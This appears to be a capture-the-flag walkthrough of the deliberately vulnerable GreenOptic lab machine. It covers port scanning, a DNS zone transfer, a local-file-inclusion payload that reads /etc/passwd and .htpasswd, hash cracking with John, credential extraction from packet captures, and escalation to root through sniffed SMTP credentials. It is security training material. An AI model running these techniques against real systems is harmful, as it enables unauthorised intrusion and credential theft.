This includes finding hidden subdomains and then exploiting a LFI to extract credentials stored in a pcap file and then gaining root by analyzing traffic flowing in the network. This is an amazing machine and requires out of the box thinking. I’ve added the IP to my hosts file, so let’s Begin!
root@kali:~# cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali 192.168.1.136 greenoptic.vm
I started the enumeration by starting a port scan with Nmap, checking for open ports and default scripts.
root@kali:~# nmap -sC -sV -oN nmap/initial greenoptic.vm Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for greenoptic.vm (192.168.1.136) Host is up (0.00086s latency). Not shown: 995 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 46:20:32:ed:f0:74:11:ed:fd:a7:a4:17:ab:f6:f0:21 (RSA) | 256 b6:fb:64:10:39:0e:f9:be:8b:5a:d0:d2:41:3e:67:68 (ECDSA) |_ 256 24:27:0b:c9:35:5f:27:7e:1a:82:73:e0:69:cc:0f:96 (ED25519) 53/tcp open domain ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7) | dns-nsid: |_ bind.version: 9.11.4-P2-RedHat-9.11.4-16.P2.el7_8.6 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: GreenOptic 10000/tcp open http MiniServ 1.953 (Webmin httpd) |_http-server-header: MiniServ/1.953 |_http-title: Site doesnt have a title (text/html; Charset=utf-8). MAC Address: 08:00:27:C2:D9:39 (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 56.55 seconds
We can see many ports open, let’s break them one by one.
- Port 21 FTP - We can try if this supports anonymous login and see if it contains some backup files or other useful information.
- Port 22 SSH - In the worst case scenario we can try running a brute force attack if we find a username.
- Port 53 DNS - This seems interesting because it is listening on TCP instead of UDP which is not common. We can look here for misconfigured dns records.
- Port 80 Apache Web Server - We can try exploiting some web vulnerabilities and get a low privilege shell.
- Port 10000 Webmin MiniServ - This is definitely exploitable depending on the version and if we can get login credentials.
I started the enumeration on port 80 first because I find it easy. Looking at port 80, we have a website which is providing broadband services.
I tried looking at the page source code, and other links on the website but did not find anything interesting. So next I started a gobuster scan to look for hidden directories.
root@kali:~# gobuster dir -u http://greenoptic.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://greenoptic.vm [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,html,txt [+] Timeout: 10s =============================================================== Starting gobuster =============================================================== /index.html (Status: 200) /img (Status: 301) /account (Status: 301) /css (Status: 301) /js (Status: 301) /LICENSE.txt (Status: 200) /statement.html (Status: 200) =============================================================== Finished ===============================================================
I went to the /account directory and found a login page. I tried logging in with some random usernames and passwords but was unable to login. But I noticed a include parameter in the URL that seemed to be interesting.
Let’s open it in Burp Suite to see if we can find a LFI vulnerability in this parameter. Set up the Burp proxy in your browser and after capturing the request, press Ctrl+R to send this request to repeater.
If we change the cookiewarning part of the include request to a typical LFI payload like ”../../../../etc/passwd” we can see it traverses back through the /var/www/html directory and then reads /etc/passwd.
This worked perfectly but still I was unable to find a way to get a shell using this vulnerability. So I went for further enumeration.
Getting a Shell on the Box
I went with the Webmin Miniserv running on port 10000. When to try to access it on the browser, we get an error, which leaks a subdomain.
I added this hostname to my hosts file and now I was able to view the webmin login page. But unfortunately I got no clues there. So next I started enumerating port 53 to see if I can find some other subdomains. Since this is listening on TCP, I used the dig axfr command to look for other subdomains.
root@kali:~# dig axfr @192.168.1.136 greenoptic.vm ; <<>> DiG 9.16.4-Debian <<>> axfr @192.168.1.136 greenoptic.vm ; (1 server found) ;; global options: +cmd greenoptic.vm. 3600 IN SOA websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600 greenoptic.vm. 3600 IN NS ns1.greenoptic.vm. ns1.greenoptic.vm. 3600 IN A 127.0.0.1 recoveryplan.greenoptic.vm. 3600 IN A 127.0.0.1 websrv01.greenoptic.vm. 3600 IN A 127.0.0.1 greenoptic.vm. 3600 IN SOA websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600 ;; Query time: 4 msec ;; SERVER: 192.168.1.136#53(192.168.1.136) ;; WHEN: Fri Jul 31 21:35:26 IST 2020 ;; XFR size: 6 records (messages 1, bytes 235)
We see another subdomain named recoveryplan. I quickly added this to my hosts file.
root@kali:~# cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali 192.168.1.136 greenoptic.vm websrv01.greenoptic.vm recoveryplan.greenoptic.vm
But when I tried opening it in the browser, it asked for a username and a password.
Mostly there is a .htaccess file which controls such authentications and a .htpasswd file which stores the password. I exploited the LFI found in the account page to read the .htpasswd file and got a hashed password.
I saved this hash into a text file and used John to crack the hash.
root@kali:~# cat hash.txt staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po. root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long" Use the "--format=md5crypt-long" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3]) Press 'q' or Ctrl-C to abort, almost any other key for status wheeler (staff) 1g 0:00:00:00 DONE (2020-08-01 08:26) 2.325g/s 30530p/s 30530c/s 30530C/s yellow7..princess94 Use the "--show" option to display all of the cracked passwords reliably Session completed
Now we can login into the recoveryplan using the username staff and password wheeler. After logging in, we see a phpBB running on the website. phpBB is a free open source bulletin board software. It allows you to kind of share messages and announcements within whatever group of people you allow it.
If we look at the latest post, we see that the user is discussing the latest attack on their company and also shares a zip file named dpi.zip and the password of this zip file has been emailed to a user Sam.
After searching on the internet, I found that all the mails are stored in the /var/mail directory. So I used burpsuite again to read the contents of /var/mail/sam
Now I downloaded the zip file and used the password HelloSunshine123 to extract the zip file. After extracting, we get a dpi.pcap file.
root@kali:~# curl http://recoveryplan.greenoptic.vm/dpi.zip -u staff --output dpi.zip4 Enter host password for user 'staff': % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 72324 100 72324 0 0 9.8M 0 --:--:-- --:--:-- --:--:-- 9.8M root@kali:~# unzip dpi.zip Archive: dpi.zip [dpi.zip] dpi.pcap password: inflating: dpi.pcap
I opened the file in Wireshark and started analyzing the traffic. While analyzing, I found the FTP credentials for user Alex.
Generally FTP password is same as the password of the user, which means we can login as user Alex via SSH using the username alex and password FwejAASD1 and read the flag for the user.
root@kali:~# ssh email@example.com firstname.lastname@example.org password: [alex@websrv01 ~]$ cat user.txt Well done. Now to try and get root access. Think outside of the box!
Rooting this box was easy, we just needed to think outside of the box! I did a lot of enumeration and tried many privilege escalation scripts but none of them worked. When I checked the id of the user, I found that the user is added to the wireshark group which means that wireshark is installed inside the box.
[alex@websrv01 ~]$ id uid=1002(alex) gid=1002(alex) groups=1002(alex),994(wireshark)
So I exited the shell and logged in again using “ssh -X” which would allow us to open GUI apps. Then I typed wireshark to open Wireshark.
root@kali:~# ssh -X email@example.com firstname.lastname@example.org password: [alex@websrv01 ~]$ wireshark
After opening Wireshark, I started capturing traffic on any and found some SMTP authentication which repeats itself after every few minutes.
On inspecting the packet, we can see a password which is encoded into base64.
After decoding the hash, we get the password for root
root@kali:~# echo -n AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28= | base64 -d rootASfojoj2eozxczzmedlmedASASDKoj3o
Now we can login as root via ssh using and read our flag!
root@kali:~# ssh email@example.com firstname.lastname@example.org's password: ASfojoj2eozxczzmedlmedASASDKoj3o [root@websrv01 ~]# id uid=0(root) gid=0(root) groups=0(root) [root@websrv01 ~]# cat root.txt Congratulations on getting root! ____ ___ _ _ / ___|_ __ ___ ___ _ __ / _ \ _ __ | |_(_) ___ | | _| '__/ _ \/ _ \ '_ \| | | | '_ \| __| |/ __| | |_| | | | __/ __/ | | | |_| | |_) | |_| | (__ \____|_| \___|\___|_| |_|\___/| .__/ \__|_|\___| |_| You've overcome a series of difficult challenges, so well done! I'm happy to make my CTFs available for free. If you enjoyed doing the CTF, please leave a comment on my blog at https://security.caerdydd.wales - I will be happy for your feedback so I can improve them and make them more enjoyable in the future. ********* Kindly place your vote on the poll located here to let me know how difficult you found it: https://security.caerdydd.wales/greenoptic-ctf/ ********* Thanks, bootlesshacker
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Andrey Prokopenko.